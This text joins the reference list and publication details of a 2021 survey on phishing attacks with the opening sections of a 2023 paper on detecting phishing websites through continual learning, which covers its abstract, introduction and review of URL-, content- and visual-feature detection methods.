Afroz, S., and Greenstadt, R. (2009). “Phishzoo: an automated web phishing detection approach based on profiling and fuzzy matching,” in Proceeding 5th IEEE international conference semantic computing (ICSC) , 1–11.

Google Scholar

Alsharnouby, M., Alaca, F., and Chiasson, S. (2015). Why phishing still works: user strategies for combating phishing attacks. Int. J. Human-Computer Stud. 82, 69–82. doi:10.1016/j.ijhcs.2015.05.005

APWG (2018). Phishing activity trends report 3rd quarter 2018 . US. 1–11.

APWG (2020). APWG phishing attack trends reports. 2020 anti-phishing work. Group, Inc Available at: https://apwg.org/trendsreports/ (Accessed September 20, 2020).

Arachchilage, N. A. G., and Love, S. (2014). Security awareness of computer users: a phishing threat avoidance perspective. Comput. Hum. Behav. 38, 304–312. doi:10.1016/j.chb.2014.05.046

Arnsten, B. A., Mazure, C. M., and April, R. S. (2012). Everyday stress can shut down the brain’s chief command center. Sci. Am. 306, 1–6. Available at: https://www.scientificamerican.com/article/this-is-your-brain-in-meltdown/ (Accessed October 15, 2019).

Bailey, J. L., Mitchell, R. B., and Jensen, B. k. (2008). “Analysis of student vulnerabilities to phishing,” in 14th americas conference on information systems, AMCIS 2008 , 75–84. Available at: https://aisel.aisnet.org/amcis2008/271 .

Barracuda (2020). Business email compromise (BEC). Available at: https://www.barracuda.com/glossary/business-email-compromise (Accessed November 15, 2020).

Belcic, I. (2020). Rootkits defined: what they do, how they work, and how to remove them. Available at: https://www.avast.com/c-rootkit (Accessed November 7, 2020).

Bergholz, A., De Beer, J., Glahn, S., Moens, M.-F., Paaß, G., and Strobel, S. (2010). New filtering approaches for phishing email. JCS 18, 7–35. doi:10.3233/JCS-2010-0371

Bin, S., Qiaoyan, W., and Xiaoying, L. (2010). “A DNS based anti-phishing approach.” in 2010 second international conference on networks security, wireless communications and trusted computing , Wuhan, China , April 24–25, 2010 . ( IEEE ), 262–265. doi:10.1109/NSWCTC.2010.196

Boddy, M. (2018). Phishing 2.0: the new evolution in cybercrime. Comput. Fraud Secur. 2018, 8–10. doi:10.1016/S1361-3723(18)30108-8

Casciani, D. (2019). Zain Qaiser: student jailed for blackmailing porn users worldwide. Available at: https://www.bbc.co.uk/news/uk-47800378 (Accessed April 9, 2019).

Chanti, S., and Chithralekha, T. (2020). Classification of anti-phishing solutions. SN Comput. Sci. 1, 11. doi:10.1007/s42979-019-0011-2

Checkpoint (2020). Check point research’s Q1 2020 brand phishing report. Available at: https://www.checkpoint.com/press/2020/apple-is-most-imitated-brand-for-phishing-attempts-check-point-researchs-q1-2020-brand-phishing-report/ (Accessed August 6, 2020).

cisco (2018). What is the difference: viruses, worms, Trojans, and bots? Available at: https://www.cisco.com/c/en/us/about/security-center/virus-differences.html (Accessed January 20, 2020).

CISA (2018). What is phishing. Available at: https://www.us-cert.gov/report-phishing (Accessed June 10, 2019).

Cormack, G. V., Smucker, M. D., and Clarke, C. L. A. (2011). Efficient and effective spam filtering and re-ranking for large web datasets. Inf. Retrieval 14, 441–465. doi:10.1007/s10791-011-9162-z

Corrata (2018). The rising threat of social media phishing attacks. Available at: https://corrata.com/the-rising-threat-of-social-media-phishing-attacks/%0D (Accessed October 29, 2019).

Crane, C. (2019). The dirty dozen: the 12 most costly phishing attack examples. Available at: https://www.thesslstore.com/blog/the-dirty-dozen-the-12-most-costly-phishing-attack-examples/#:∼:text=At some level%2C everyone is susceptible to phishing,outright trick you into performing a particular task (Accessed August 2, 2020).

CSI Onsite (2012). Phishing. Available at: http://csionsite.com/2012/phishing/ (Accessed May 8, 2019).

Cui, Q., Jourdan, G.-V., Bochmann, G. V., Couturier, R., and Onut, I.-V. (2017). Tracking phishing attacks over time. Proc. 26th Int. Conf. World Wide Web - WWW ’17 , Republic and Canton of Geneva, Switzerland: International World Wide Web Conferences Steering Committee . 667–676. doi:10.1145/3038912.3052654

CVEdetails (2005). Vulnerability in microsoft internet explorer. Available at: https://www.cvedetails.com/cve/CVE-2005-4089/ (Accessed August 20, 2019).

Cybint Cyber Solutions (2018). 13 alarming cyber security facts and stats. Available at: https://www.cybintsolutions.com/cyber-security-facts-stats/ (Accessed July 20, 2019).

Deshmukh, M., and raddha Popat, S. (2017). Different techniques for detection of phishing attack. Int. J. Eng. Sci. Comput. 7, 10201–10204. Available at: http://ijesc.org/ .

Dhamija, R., Tygar, J. D., and Hearst, M. (2006). “Why phishing works,” in Proceedings of the SIGCHI conference on human factors in computing systems - CHI ’06 , Montréal Québec, Canada , (New York, NY: ACM Press ), 581. doi:10.1145/1124772.1124861

Diaz, A., Sherman, A. T., and Joshi, A. (2020). Phishing in an academic community: a study of user susceptibility and behavior. Cryptologia 44, 53–67. doi:10.1080/01611194.2019.1623343

Dodge, R. C., Carver, C., and Ferguson, A. J. (2007). Phishing for user security awareness. Comput. Security 26, 73–80. doi:10.1016/j.cose.2006.10.009

eBay Toolbar and Account Guard (2009). Available at: https://download.cnet.com/eBay-Toolbar/3000-12512_4-10153544.html (Accessed August 7, 2020).

EDUCBA (2017). Hackers vs crackers: easy to understand exclusive difference. Available at: https://www.educba.com/hackers-vs-crackers/ (Accessed July 17, 2019).

Evers, J. (2006). Security expert: user education is pointless. Available at: https://www.cnet.com/news/security-expert-user-education-is-pointless/ (Accessed June 25, 2019).

F5Networks (2018). Panda malware broadens targets to cryptocurrency exchanges and social media. Available at: https://www.f5.com/labs/articles/threat-intelligence/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media (Accessed April 23, 2019).

Fette, I., Sadeh, N., and Tomasic, A. (2007). “Learning to detect phishing emails,” in Proceedings of the 16th international conference on world wide web - WWW ’07 , Banff Alberta, Canada , (New York, NY: ACM Press) , 649–656. doi:10.1145/1242572.1242660

Financial Fraud Action UK (2017). Fraud the facts 2017: the definitive overview of payment industry fraud. London. Available at: https://www.financialfraudaction.org.uk/fraudfacts17/assets/fraud_the_facts.pdf .

Fraud Watch International (2019). Phishing attack trends for 2019. Available at: https://fraudwatchinternational.com/phishing/phishing-attack-trends-for-2019/ (Accessed October 29, 2019).

FTC (2018). Netflix scam email. Available at: https://www.ftc.gov/tips-advice/business-center/small-businesses/cybersecurity/phishing (Accessed May 8, 2019).

Furnell, S. (2007). An assessment of website password practices). Comput. Secur. 26, 445–451. doi:10.1016/j.cose.2007.09.001

Getsafeonline (2017). Caught on the net. Available at: https://www.getsafeonline.org/news/caught-on-the-net/%0D (Accessed August 1, 2020).

GOV.UK (2020). Cyber security breaches survey 2020. Available at: https://www.gov.uk/government/publications/cyber-security-breaches-survey-2020/cyber-security-breaches-survey-2020 (Accessed August 6, 2020).

Gupta, P., Srinivasan, B., Balasubramaniyan, V., and Ahamad, M. (2015). “Phoneypot: data-driven understanding of telephony threats,” in Proceedings 2015 network and distributed system security symposium , (Reston, VA: Internet Society ), 8–11. doi:10.14722/ndss.2015.23176

Hadlington, L. (2017). Human factors in cybersecurity; examining the link between internet addiction, impulsivity, attitudes towards cybersecurity, and risky cybersecurity behaviours. Heliyon 3, e00346-18. doi:10.1016/j.heliyon.2017.e00346

Herley, C., and Florêncio, D. (2008). “A profitless endeavor,” in New security paradigms workshop (NSPW ’08) , New Hampshire, United States , October 25–28, 2021 , 1–12. doi:10.1145/1595676.1595686

Hewage, C. (2020). Coronavirus pandemic has unleashed a wave of cyber attacks – here’s how to protect yourself. Conversat . Available at: https://theconversation.com/coronavirus-pandemic-has-unleashed-a-wave-of-cyber-attacks-heres-how-to-protect-yourself-135057 (Accessed November 16, 2020).

Hong, J. (2012). The state of phishing attacks. Commun. ACM 55, 74–81. doi:10.1145/2063176.2063197

Huber, M., Kowalski, S., Nohlberg, M., and Tjoa, S. (2009). “Towards automating social engineering using social networking sites,” in 2009 international conference on computational science and engineering , Vancouver, BC , August 29–31, 2009 ( IEEE , 117–124. doi:10.1109/CSE.2009.205

Hutchings, A., Clayton, R., and Anderson, R. (2016). “Taking down websites to prevent crime,” in 2016 APWG symposium on electronic crime research (eCrime) ( IEEE ), 1–10. doi:10.1109/ECRIME.2016.7487947

Iuga, C., Nurse, J. R. C., and Erola, A. (2016). Baiting the hook: factors impacting susceptibility to phishing attacks. Hum. Cent. Comput. Inf. Sci. 6, 8. doi:10.1186/s13673-016-0065-2

Jagatic, T. N., Johnson, N. A., Jakobsson, M., and Menczer, F. (2007). Social phishing. Commun. ACM 50, 94–100. doi:10.1145/1290958.1290968

Jakobsson, M., and Myers, S. (2006). Phishing and countermeasures: understanding the increasing problems of electronic identity theft . New Jersey: John Wiley and Sons .

Jakobsson, M., Tsow, A., Shah, A., Blevis, E., and Lim, Y. K. (2007). “What instills trust? A qualitative study of phishing,” in Lecture notes in computer science (including subseries lecture notes in artificial intelligence and lecture notes in bioinformatics) , (Berlin, Heidelberg: Springer ), 356–361. doi:10.1007/978-3-540-77366-5_32

Jeeva, S. C., and Rajsingh, E. B. (2016). Intelligent phishing url detection using association rule mining. Hum. Cent. Comput. Inf. Sci. 6, 10. doi:10.1186/s13673-016-0064-3

Johnson, A. (2016). Almost 600 accounts breached in “celebgate” nude photo hack, FBI says. Available at: http://www.cnbc.com/id/102747765 (Accessed: February 17, 2020).

Kayne, R. (2019). What are script kiddies? Wisegeek. Available at: https://www.wisegeek.com/what-are-script-kiddies.htm V V February 19, 2020).

Keck, C. (2018). FTC warns of sketchy Netflix phishing scam asking for payment details. Available at: https://gizmodo.com/ftc-warns-of-sketchy-netflix-phishing-scam-asking-for-p-1831372416 (Accessed April 23, 2019).

Keepnet LABS (2018). Statistical analysis of 126,000 phishing simulations carried out in 128 companies around the world. USA, France. Available at: www.keepnetlabs.com .

Keinan, G. (1987). Decision making under stress: scanning of alternatives under controllable and uncontrollable threats. J. Personal. Soc. Psychol. 52, 639–644. doi:10.1037/0022-3514.52.3.639

Khonji, M., Iraqi, Y., and Jones, A. (2013). Phishing detection: a literature survey. IEEE Commun. Surv. Tutorials 15, 2091–2121. doi:10.1109/SURV.2013.032213.00009

Kirda, E., and Kruegel, C. (2005). Protecting users against phishing attacks with AntiPhish. Proc. - Int. Comput. Softw. Appl. Conf. 1, 517–524. doi:10.1109/COMPSAC.2005.126

Krawchenko, K. (2016). The phishing email that hacked the account of John Podesta. CBSNEWS Available at: https://www.cbsnews.com/news/the-phishing-email-that-hacked-the-account-of-john-podesta/ (Accessed April 13, 2019).

Ksepersky (2020). Spam and phishing in Q1 2020. Available at: https://securelist.com/spam-and-phishing-in-q1-2020/97091/ (Accessed July 27, 2020).

Kumaraguru, P., Sheng, S., Acquisti, A., Cranor, L. F., and Hong, J. (2010). Teaching Johnny not to fall for phish. ACM Trans. Internet Technol. 10, 1–31. doi:10.1145/1754393.1754396

Latto, N. (2020). What is adware and how can you prevent it? Avast. Available at: https://www.avast.com/c-adware (Accessed May 8, 2020).

Le, D., Fu, X., and Hogrefe, D. (2006). A review of mobility support paradigms for the internet. IEEE Commun. Surv. Tutorials 8, 38–51. doi:10.1109/COMST.2006.323441

Lehman, T. J., and Vajpayee, S. (2011). “We’ve looked at clouds from both sides now,” in 2011 annual SRII global conference , San Jose, CA , March 20–April 2, 2011 , ( IEEE , 342–348. doi:10.1109/SRII.2011.46

Leyden, J. (2001). Virus toolkits are s’kiddie menace. Regist . Available at: https://www.theregister.co.uk/2001/02/21/virus_toolkits_are_skiddie_menace/%0D (Accessed June 15, 2019).

Lin, J., Sadeh, N., Amini, S., Lindqvist, J., Hong, J. I., and Zhang, J. (2012). “Expectation and purpose,” in Proceedings of the 2012 ACM conference on ubiquitous computing - UbiComp ’12 (New York, New York, USA: ACM Press ), 1625. doi:10.1145/2370216.2370290

Lininger, R., and Vines, D. R. (2005). Phishing: cutting the identity theft line. Print book . Indiana: Wiley Publishing, Inc .

Ma, J., Saul, L. K., Savage, S., and Voelker, G. M. (2009). “Identifying suspicious URLs.” in Proceedings of the 26th annual international conference on machine learning - ICML ’09 (New York, NY: ACM Press ), 1–8. doi:10.1145/1553374.1553462

Marforio, C., Masti, R. J., Soriente, C., Kostiainen, K., and Capkun, S. (2015). Personalized security indicators to detect application phishing attacks in mobile platforms. Available at: http://arxiv.org/abs/1502.06824 .

Margaret, R. I. P. (2008). PBX (private branch exchange). Available at: https://searchunifiedcommunications.techtarget.com/definition/IP-PBX (Accessed June 19, 2019).

Maurer, M.-E., and Herzner, D. (2012). Using visual website similarity for phishing detection and reporting. 1625–1630. doi:10.1145/2212776.2223683

Medvet, E., Kirda, E., and Kruegel, C. (2008). “Visual-similarity-based phishing detection,” in Proceedings of the 4th international conference on Security and privacy in communication netowrks - SecureComm ’08 (New York, NY: ACM Press ), 1. doi:10.1145/1460877.1460905

Merwe, A. v. d., Marianne, L., and Marek, D. (2005). “Characteristics and responsibilities involved in a Phishing attack, in WISICT ’05: proceedings of the 4th international symposium on information and communication technologies . Trinity College Dublin , 249–254.

Microsoft (2020). Exploiting a crisis: how cybercriminals behaved during the outbreak. Available at: https://www.microsoft.com/security/blog/2020/06/16/exploiting-a-crisis-how-cybercriminals-behaved-during-the-outbreak/ (Accessed August 1, 2020).

Mince-Didier, A. (2020). Hacking a computer or computer network. Available at: https://www.criminaldefenselawyer.com/resources/hacking-computer.html (Accessed August 7, 2020).

Miyamoto, D., Hazeyama, H., and Kadobayashi, Y. (2009). “An evaluation of machine learning-based methods for detection of phishing sites,” in international conference on neural information processing ICONIP 2008: advances in neuro-information processing lecture notes in computer science . Editors M. Köppen, N. Kasabov, and G. Coghill (Berlin, Heidelberg: Springer Berlin Heidelberg ), 539–546. doi:10.1007/978-3-642-02490-0_66

Mohammad, R. M., Thabtah, F., and McCluskey, L. (2014). Predicting phishing websites based on self-structuring neural network. Neural Comput. Applic 25, 443–458. doi:10.1007/s00521-013-1490-z

Moore, T., and Clayton, R. (2007). “Examining the impact of website take-down on phishing,” in Proceedings of the anti-phishing working groups 2nd annual eCrime researchers summit on - eCrime ’07 (New York, NY: ACM Press ), 1–13. doi:10.1145/1299015.1299016

Morgan, S. (2019). 2019 official annual cybercrime report. USA, UK, Canada. Available at: https://www.herjavecgroup.com/wp-content/uploads/2018/12/CV-HG-2019-Official-Annual-Cybercrime-Report.pdf .

Nathan, G. (2020). What is phishing? + laws, charges & statute of limitations. Available at: https://www.federalcharges.com/phishing-laws-charges/ (Accessed August 7, 2020).

Okin, S. (2009). From script kiddies to organised cybercrime. Available at: https://comsecglobal.com/from-script-kiddies-to-organised-cybercrime-things-are-getting-nasty-out-there/ (Accessed August 12, 2019).

Ollmann, G. (2004). The phishing guide understanding & preventing phishing attacks abstract. USA. Available at: http://www.ngsconsulting.com .

Ong, S. (2014). Avast survey shows men more susceptible to mobile malware. Available at: https://www.mirekusoft.com/avast-survey-shows-men-more-susceptible-to-mobile-malware/ (Accessed November 5, 2020).

Ovelgönne, M., Dumitraş, T., Prakash, B. A., Subrahmanian, V. S., and Wang, B. (2017). Understanding the relationship between human behavior and susceptibility to cyber attacks. ACM Trans. Intell. Syst. Technol. 8, 1–25. doi:10.1080/00207284.1985.11491413

Parmar, B. (2012). Protecting against spear-phishing. Computer Fraud Security , 2012, 8–11. doi:10.1016/S1361-3723(12)70007-6

Phish Labs (2019). 2019 phishing trends and intelligence report the growing social engineering threat. Available at: https://info.phishlabs.com/hubfs/2019 PTI Report/2019 Phishing Trends and Intelligence Report.pdf .

PhishMe (2016). Q1 2016 malware review. Available at: WWW.PHISHME.COM .

PhishMe (2017). Human phishing defense enterprise phishing resiliency and defense report 2017 analysis of susceptibility, resiliency and defense against simulated and real phishing attacks. Available at: https://cofense.com/wp-content/uploads/2017/11/Enterprise-Phishing-Resiliency-and-Defense-Report-2017.pdf .

PishTank (2006). What is phishing. Available at: http://www.phishtank.com/what_is_phishing.php?view=website&annotated=true (Accessed June 19, 2019).

Pompon, A. R., Walkowski, D., and Boddy, S. (2018). Phishing and Fraud Report attacks peak during the holidays. US .

Proofpoint (2019a). State of the phish 2019 report. Sport Mark. Q. 14, 4. doi:10.1038/sj.jp.7211019

Proofpoint (2019b). What is Proofpoint. Available at: https://www.proofpoint.com/us/company/about (Accessed September 25, 2019).

Proofpoint (2020). 2020 state of the phish. Available at: https://www.proofpoint.com/sites/default/files/gtd-pfpt-us-tr-state-of-the-phish-2020.pdf .

Raggo, M. (2016). Anatomy of a social media attack. Available at: https://www.darkreading.com/analytics/anatomy-of-a-social-media-attack/a/d-id/1326680 (Accessed March 14, 2019).

Ramanathan, V., and Wechsler, H. (2012). PhishGILLNET-phishing detection methodology using probabilistic latent semantic analysis, AdaBoost, and co-training. EURASIP J. Info. Secur. 2012, 1–22. doi:10.1186/1687-417X-2012-1

Ramzan, Z. (2010). “Phishing attacks and countermeasures,” in Handbook of Information and communication security (Berlin, Heidelberg: Springer Berlin Heidelberg ), 433–448. doi:10.1007/978-3-642-04117-4_23

Ramzan, Z., and Wuest, C. (2007). “Phishing Attacks: analyzing trends in 2006,” in Fourth conference on email and anti-Spam (Mountain View , ( California, United States ).

Rhett, J. (2019). Don’t fall for this new Google translate phishing attack. Available at: https://www.gizmodo.co.uk/2019/02/dont-fall-for-this-new-google-translate-phishing-attack/ (Accessed April 23, 2019). doi:10.5040/9781350073272

RISKIQ (2020). Investigate | COVID-19 cybercrime weekly update. Available at: https://www.riskiq.com/blog/analyst/covid19-cybercrime-update/%0D (Accessed August 1, 2020).

Robichaux, P., and Ganger, D. L. (2006). Gone phishing: evaluating anti-phishing tools for windows. Available at: http://www.3sharp.com/projects/antiphishing/gonephishing.pdf .

Rouse, M. (2013). Phishing defintion. Available at: https://searchsecurity.techtarget.com/definition/phishing (Accessed April 10, 2019).

Salem, O., Hossain, A., and Kamala, M. (2010). “Awareness program and AI based tool to reduce risk of phishing attacks,” in 2010 10th IEEE international conference on computer and information technology (IEEE) , Bradford, United Kingdom , June 29–July 1, 2010, 2001 ( IEEE ), 1418–1423. doi:10.1109/CIT.2010.254

Scaife, N., Carter, H., Traynor, P., and Butler, K. R. B. (2016). “Crypto lock (and drop it): stopping ransomware attacks on user data,” in 2016 IEEE 36th international conference on distributed computing systems (ICDCS) ( IEEE , 303–312. doi:10.1109/ICDCS.2016.46

Sheng, S., Magnien, B., Kumaraguru, P., Acquisti, A., Cranor, L. F., Hong, J., et al. (2007). “Anti-Phishing Phil: the design and evaluation of a game that teaches people not to fall for phish,” in Proceedings of the 3rd symposium on usable privacy and security - SOUPS ’07 (New York, NY: ACM Press ), 88–99. doi:10.1145/1280680.1280692

Symantic, (2019). Internet security threat report volume 24|February 2019 . USA.

Techpedia (2021). Caller ID. Available at: https://www.techopedia.com/definition/24222/caller-id (Accessed June 19, 2019).

VadeSecure (2021). Phishers favorites 2019. Available at: https://www.vadesecure.com/en/ (Accessed October 29, 2019).

Vishwanath, A. (2005). “Spear phishing: the tip of the spear used by cyber terrorists,” in deconstruction machines (United States: University of Minnesota Press ), 469–484. doi:10.4018/978-1-5225-0156-5.ch023

Wang, X., Zhang, R., Yang, X., Jiang, X., and Wijesekera, D. (2008). “Voice pharming attack and the trust of VoIP,” in Proceedings of the 4th international conference on security and privacy in communication networks, SecureComm’08 , 1–11. doi:10.1145/1460877.1460908

Wenyin, L., Huang, G., Xiaoyue, L., Min, Z., and Deng, X. (2005). “Detection of phishing webpages based on visual similarity,” in 14th international world wide web conference, WWW2005 , Chiba, Japan , May 10–14, 2005 , 1060–1061. doi:10.1145/1062745.1062868

Whitman, M. E., and Mattord, H. J. (2012). Principles of information security. Course Technol. 1–617. doi:10.1016/B978-0-12-381972-7.00002-6

Williams, E. J., Hinds, J., and Joinson, A. N. (2018). Exploring susceptibility to phishing in the workplace. Int. J. Human-Computer Stud. 120, 1–13. doi:10.1016/j.ijhcs.2018.06.004

wombatsecurity.com (2018). Wombat security user risk report. USA. Available at: https://info.wombatsecurity.com/hubfs/WombatProofpoint-UserRiskSurveyReport2018_US.pdf .

Workman, M. (2008). Wisecrackers: a theory-grounded investigation of phishing and pretext social engineering threats to information security. J. Am. Soc. Inf. Sci. 59 (4), 662–674. doi:10.1002/asi.20779

Yeboah-Boateng, E. O., and Amanor, P. M. (2014). Phishing , SMiShing & vishing: an assessment of threats against mobile devices. J. Emerg. Trends Comput. Inf. Sci. 5 (4), 297–307.

Zhang, Y., Hong, J. I., and Cranor, L. F. (2007). “Cantina,” in Proceedings of the 16th international conference on World Wide Web - WWW ’07 (New York, NY: ACM Press ), 639. doi:10.1145/1242572.1242659

Zissis, D., and Lekkas, D. (2012). Addressing cloud computing security issues. Future Generat. Comput. Syst. 28, 583–592. doi:10.1016/j.future.2010.12.006

Keywords: phishing anatomy, precautionary countermeasures, phishing targets, phishing attack mediums, phishing attacks, attack phases, phishing techniques

Citation: Alkhalil Z, Hewage C, Nawaf L and Khan I (2021) Phishing Attacks: A Recent Comprehensive Study and a New Anatomy. Front. Comput. Sci. 3:563060. doi: 10.3389/fcomp.2021.563060

Received: 17 May 2020; Accepted: 18 January 2021; Published: 09 March 2021.

Reviewed by:

Copyright © 2021 Alkhalil, Hewage, Nawaf and Khan. This is an open-access article distributed under the terms of the Creative Commons Attribution License (CC BY). The use, distribution or reproduction in other forums is permitted, provided the original author(s) and the copyright owner(s) are credited and that the original publication in this journal is cited, in accordance with accepted academic practice. No use, distribution or reproduction is permitted which does not comply with these terms.

*Correspondence: Chaminda Hewage, [email protected]

Disclaimer: All claims expressed in this article are solely those of the authors and do not necessarily represent those of their affiliated organizations, or those of the publisher, the editors and the reviewers. Any product that may be evaluated in this article or claim that may be made by its manufacturer is not guaranteed or endorsed by the publisher.

Thank you for visiting nature.com. You are using a browser version with limited support for CSS. To obtain the best experience, we recommend you use a more up to date browser (or turn off compatibility mode in Internet Explorer). In the meantime, to ensure continued support, we are displaying the site without styles and JavaScript.

View all journals
Explore content
About the journal
Publish with us
Sign up for alerts
Open access
Published: 17 July 2023

Life-long phishing attack detection using continual learning

Asif Ejaz 1 ,
Adnan Noor Mian 1 &
Sanaullah Manzoor 1

Scientific Reports volume 13 , Article number: 11488 ( 2023 ) Cite this article

3003 Accesses

6 Citations

Metrics details

Computer science
Mathematics and computing

Phishing is an identity theft that employs social engineering methods to get confidential data from unwary users. A phisher frequently attempts to trick the victim into clicking a URL that leads to a malicious website. Many phishing attack victims lose their credentials and digital assets daily. This study demonstrates how the performance of traditional machine learning (ML)-based phishing detection models deteriorates over time. This failure is due to drastic changes in feature distributions caused by new phishing techniques and technological evolution over time. This paper explores continual learning (CL) techniques for sustained phishing detection performance over time. To demonstrate this behavior, we collect phishing and benign samples for three consecutive years from 2018 to 2020 and divide them into six datasets to evaluate traditional ML and proposed CL algorithms. We train a vanilla neural network (VNN) model in the CL fashion using deep feature embedding of HTML contents. We compare the proposed CL algorithms with the VNN model trained from scratch and with transfer learning (TL). We show that CL algorithms maintain accuracy over time with a tolerable deterioration of 2.45%. In contrast, VNN and TL-based models’ performance deteriorates by over 20.65% and 8%, respectively.

An effective detection approach for phishing websites using URL and HTML features

Deep fake detection and classification using error-level analysis and deep learning

A holistic and proactive approach to forecasting cyber threats

Introduction.

Phishing is a technique in which a cyber-criminal (also known as an attacker) clones a website’s interface and sends a compelling message to a naive user through an email or social media chat to open the link in that message. A similar but cloned interface is opened when a user opens the link. Any username and password entered in this interface is sent to the attacker, which can then be exploited. The number of phishing attacks is increasing. According to the anti-phishing working group (APWG), 316, 747 phishing attacks were reported in December 2021, which was the highest monthly total in APWG’s history 1 .

Phishing attacks have become a serious threat and need to be detected on the fly before the user gets trapped. Over the years, phishing attacks have matured by using advanced phishing methods and web development technology to become less prone to detection 2 , and they are continuously evolving and adapting to evade current intrusion detection systems and intrusion prevention systems. Generally, phishing detection systems can be classified into two groups, i.e., rule-based and ML-based 3 . Rule-based phishing detection systems blacklist malicious domains and URLs 4 . A manual effort is required to update the new domains and websites. Such systems cannot detect a first-time attack (zero-day attack). Also, these cannot detect false positive incidents (samples that are normal, but the system has predicted them as malicious) due to human error in labeling 2 . ML-based techniques, on the other hand, utilize the historical data of phishing pages to find patterns in the webpage content 5 , 6 , 7 , 8 and URLs 4 , 9 , 10 of web pages. ML-based methods are now state-of-the-art in phishing detection as they perform better than rule-based detection systems 4 , 11 , 12 . Although ML-based methods are effective in phishing detection, these systems, because of being trained on historical datasets, fail to detect sophisticated crafted phishing samples in the future due to changes in feature distribution. Regular model retraining or TL on these upcoming samples mitigates this issue but leads to performance deterioration in the older samples detection. To tackle this problem, we adopted CL-based algorithms to maintain the performance of old and new phishing attacks detection. In TL, the last few layers of an existing model are retrained to adapt it to a new dataset, while in CL, a model is retrained to adapt to new data while maintaining performance on previous data. We shall discuss details of these methods in Section “ Methodology ”.

The specific contributions of this study are: (i) we identify performance deterioration over time in traditional ML systems for phishing detection due to excessive changes in feature distribution and the evolution of web development technologies, (ii) we propose a CL-based phishing detection framework to cope with performance drop issues in traditional ML models and show that the approach improves learning performance with limited training data and requires less retraining time.

The rest of the paper is organized as follows. We provide related work in Section “ Related Work ”. We define research tools and methods in Section “ Research tools and methods ”. We present our methodology in Section “ Methodology ”. We describe experiments and results in Section “ Performance comparison of continual learning ”. We perform analysis in Section “ Discussions ”. Finally, we conclude in Section “ Conclusion and future work ”.

Related Work

As phishing attacks grow, researchers are putting efforts into providing reliable and resilient solutions for automatically detecting phishing attacks. Current ML-based phishing detection techniques are classified based on features used for detection, i.e., URL features, content features, and visual and hybrid features based detection. These detection techniques are discussed in the following section.

URL features based detection

Phishing detection using URLs is effective for offline training data. Few studies 4 , 7 , 13 have identified and extracted hand-crafted features from URLs and used these features all alone or in combination with content-based features to train ML models. They used support vector machine (SVM), decision tree (DT), and random forest (RF) models and achieved more than 95% accuracy. Recent studies 14 , 15 , 16 , 17 , 18 have used deep learning-based methods such as convolutional neural networks (CNN) and generative adversarial networks (GAN). URLs are generated through the GAN model to solve the data bias problem caused by the imbalance in phishing datasets. Their method achieved an accuracy of 95.6%. Wei et al. 15 proposed a novel multi-spatial character-level model that is applied to URLs using (CNN) for fast and accurate phishing detection. Patil et al. 16 reviewed URL-based techniques and developed a model to overcome the issues of bias found in previous works. Sherazi et al. 10 observed that URL is not the best way to detect a phishing website. Their proposed system uses only domain names, as phishers can control the URL but can not change the domain name. They developed a faster and unbiased system with only seven features and an accuracy of 97-99.7%. Tian et al. 2 highlights that URL-based detection methods have some limitations as particular domain names, such as internationalized domain names, allow attackers to register domains similar to some famous domains using different characters from local language to look similar to a legitimate domain. Furthermore, all of these URL-based detection methods lack the detection of advanced phishing techniques because they are not using webpage content features.

Content based detection

Recent studies used particular keywords from webpage content as discriminative features for more robust phishing detection. Some researchers have employed ML algorithms to tackle the phishing detection problem and achieved promising results 6 , 8 , 11 , 19 , 20 , 21 , 22 , 23 , 24 . Advancements in both feature extraction and detection models have been made in these studies, for instance, content-based features extracted with NLP and reinforcement learning, ensembles and bagging for training, and others. Many recent studies used NLP-based feature extraction on email manuscripts and trained the ML models 6 , 19 , 23 , 25 . These studies proved the success of the NLP-based features in detecting phishing emails with an accuracy of 98.2%. Smadi et al. 11 used reinforcement learning and extracted four features, including embedded URLs, HTML content, email header, and email manuscript features. With a dataset of approximately ten thousand data samples, they obtained 98.6% detection accuracy. Ubing et al. 20 used RF to extract features, and the nine best content-based features out of 30 were selected and were used to train ensemble classifiers. Their ML system used a majority voting method to avoid model overfitting and achieved 95% accuracy.

Zamir et al. 21 introduced a new approach using multiple ML algorithms. They used an ensemble of RF, neural networks (NN), and Bagging to achieve 97.4% accuracy in detecting phishing web pages. Their study shows that ensemble techniques are among the best detection strategies for phishing web pages detection. Niakanlahiji et al. 22 crafted many features from HTML content, code complexity, and certificate features to devise a target-independent detection method. As a result, they achieved 95.4% accuracy with RF. Zheng et al. 26 uses feature embedding and NN to detect phishing pages. It also combines character-level information with word-level information while embedding features. Their results are quite promising, with an accuracy of 98.30%, a true positive rate of 99.18%, and a true negative rate of 94.34%.

Liu et al. 27 designed a multistage model that applies initial filters to detect phishing pages, such as the number of page views, etc. Moreover, they proposed a framework called CASE for extensive feature extraction. Their proposed multistage model with the CASE framework could achieve a recall of 0.9436, a precision of 0.9892, and an F1 measure of 0.9659. Tan et al. 28 proposed a new technique of detection based on graph theory. They used the hyperlinks on the page to create the graph features to represent deeper information between features. Their experimental results showed an accuracy of 97.8%. Yi et al. 24 presented three types of web phishing detection features: original and interaction features. It then used deep belief networks. This model achieved around 90% true positive rate and 0.6% false positive rate.

Some studies used feature selection methods to improve accuracy. For instance, Chiew et al. 29 proposed a new feature selection technique called the hybrid ensemble feature selection. It consists of two phases that produce a set of baseline features. The hybrid ensemble feature selection shows the best results when used with the RF classifier, which achieves an accuracy of 94.6% with only 20.8% of the features used originally.

All content-based techniques rely on content-specific features. These techniques are robust to some extent but can also not capture advanced evasion techniques. When attackers use code obfuscation, then hand-crafted, content-based features will not be helpful anymore for phishing page detection. Furthermore, these techniques require time to process website content during runtime. So, there is a need for fast and efficient methods that use a deep vector embedding representation of content and are resilient to phishing web pages detection.

Visual and hybrid features based detection

Some recent works used visual-based features combined with text features to improve phishing detection. Visual features are computed with the cosine similarity of the phishing page with the corresponding legitimate page 8 , 12 , 17 , 30 , 31 , 32 . Rao et al. 12 have used a hybrid detection approach that employs both ML-based and visual similarity-based detection. This detection mechanism requires a vast image database to compare phishing web pages. They achieved 99.55% accuracy using HTML content-based features, URL-based features, and some third-party features. However, third-party features (online features) are costly and slow, making this approach impractical for real-time deployment.

Tial et al. 2 identified squatting domain classes, obfuscation techniques, and essential features for robust learning. They extracted keywords from visual screenshots of pages using an optical character recognizer (OCR). They also converted code to vectors using feature embeddings to develop a robust detection model. They achieved 97% accuracy with RF, which is better than Naive Bayes and KNN. On the other hand, Chiew et al. 29 used the website’s logo to detect phishing websites by applying a two-stage method. The first stage is extracting the logo from the website and using Google image search to find the domain name corresponding to the extracted logo. The method then compares the domain from the query website with the domain retrieved and classifies them according to URLs.

